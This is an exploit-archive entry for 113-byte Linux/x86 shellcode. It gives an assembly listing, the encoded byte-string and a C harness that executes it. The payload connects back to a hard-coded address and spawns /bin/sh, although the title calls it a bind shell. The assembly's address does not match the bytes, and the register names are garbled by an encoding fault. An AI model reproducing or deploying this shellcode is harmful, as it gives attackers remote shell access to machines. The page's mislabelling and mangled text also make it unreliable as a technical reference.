Linux/x86 - Bind TCP (3879/TCP) Shell (/bin/sh) Shellcode (113 bytes)

2009-01-01 16:05:13

/*
Connecting shellcode written by lamagra <[email protected]>
http://lamagra.seKure.de

May 2000

.file "connect"
.version "01.01"
.text
.align 4
_start:
#socket(AF_INET,SOCK_STREAM,IPPROTO_IP);
movl %esp,ëp
xorl íx,íx
movb $102,íx
movl íx,êx # 102 = socketcall
xorl ìx,ìx
movl ìx,ëx
incl ëx # socket()
movl ëx, -8(ëp) # 1 = SOCK_STREAM
incl ëx
movl ëx, -12(ëp) # 2 = AF_INET
decl ëx # 1 = SYS_socket
movl ìx, -4(ëp) # 0 = IPPROTO_IP
leal -12(ëp),ìx # put args in correct place
int $0x80 # switch to kernel-mode
xorl ìx,ìx
movl êx,-12(ëp) # save the fd

# connect(fd,(struct sockaddr *)&struct,16);
incl ëx
movw ëx,-20(ëp) # 2 = PF_INET
movw $9999,-18(ëp) # 9999 = htons(3879);
movl $0x100007f,-16(ëp) # htonl(IP)
leal -20(ëp),êx # struct sockaddr
movl êx,-8(ëp) # load the struct
movb $16,-4(ëp) # 16 = sizeof(sockaddr)
movl íx,êx # 102 = socketcall
incl ëx # 3 = SYS_connect
leal -12(ëp),ìx # put args in place
int $0x80 # call socketcall()

# dup2(fd,0-1-2)
xorl ìx,ìx
movb $63,êx # 63 = dup2()
int $0x80
incl ìx
cmpl $3,ìx
jne -0xa

# arg[0] = "/bin/sh"
# arg[1] = 0x0
# execve(arg[0],arg);
jmp 0x18
popl %esi
movl %esi,0x8(ëp)
xorl êx,êx
movb êx,0x7(%esi)
movl êx,0xc(ëp)
movb $0xb,%al
movl %esi,ëx
leal 0x8(ëp),ìx
leal 0xc(ëp),íx
int $0x80
call -0x1d
.string "/bin/sh"
*/

#define NAME "connecting"

char code[]=
"\x89\xe5\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8"
"\x43\x89\x5d\xf4\x4b\x89\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89"
"\x45\xf4\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\x0f\x27\xc7\x45\xf0"
"\x7f\x01\x01\x01\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10\x89\xd0"
"\x43\x8d\x4d\xf4\xcd\x80\x31\xc9\xb0\x3f\xcd\x80\x41\x83\xf9\x03"
"\x75\xf6\xeb\x18\x5e\x89\x75\x08\x31\xc0\x88\x46\x07\x89\x45\x0c"
"\xb0\x0b\x89\xf3\x8d\x4d\x08\x8d\x55\x0c\xcd\x80\xe8\xe3\xff\xff"
"\xff/bin/sh";


main()
{
int (*funct)();
funct = (int (*)()) code;
printf("%s shellcode\n\tSize = %d\n",NAME,strlen(code));
(int)(*funct)();
}

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.